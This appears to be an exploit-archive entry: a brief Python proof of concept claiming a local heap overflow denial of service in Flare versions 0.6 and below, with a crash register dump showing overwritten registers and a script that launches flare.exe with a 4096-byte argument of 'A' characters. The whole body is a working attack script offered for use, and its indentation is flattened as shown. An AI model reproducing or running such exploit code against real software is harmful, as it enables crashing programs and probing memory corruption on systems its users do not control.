Flare versions 0.6 and below local heap overflow denial of service exploit.
b3d27bcc33b449e871fbb238c6b946edd4a80b55a3871f001fd92a5356dcfbff
#!/usr/bin/env python
#IRC: irc.nix.co.il<http://irc.nix.co.il>
#Site: xraysecurity.blogspot.com<http://xraysecurity.blogspot.com> <---- Coming soon!
#Registers:
#EAX 003E0000
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
#EDX 41414141
#EBX 00004141
#ESP 0022FB0C
#EBP 0022FBDC
#ESI 003E1080
#EDI 41414141
#EIP 77195B44 ntdll.77195B44
import os, sys
if len(sys.argv) != 1:
path=sys.argv[1]
else:
path='flare.exe'
if not os.path.exists(path):
print 'Usage: python %s [path to flare.exe]' % sys.argv[0]
exit(-1)
os.execl(path, path, 'A'*0x1000)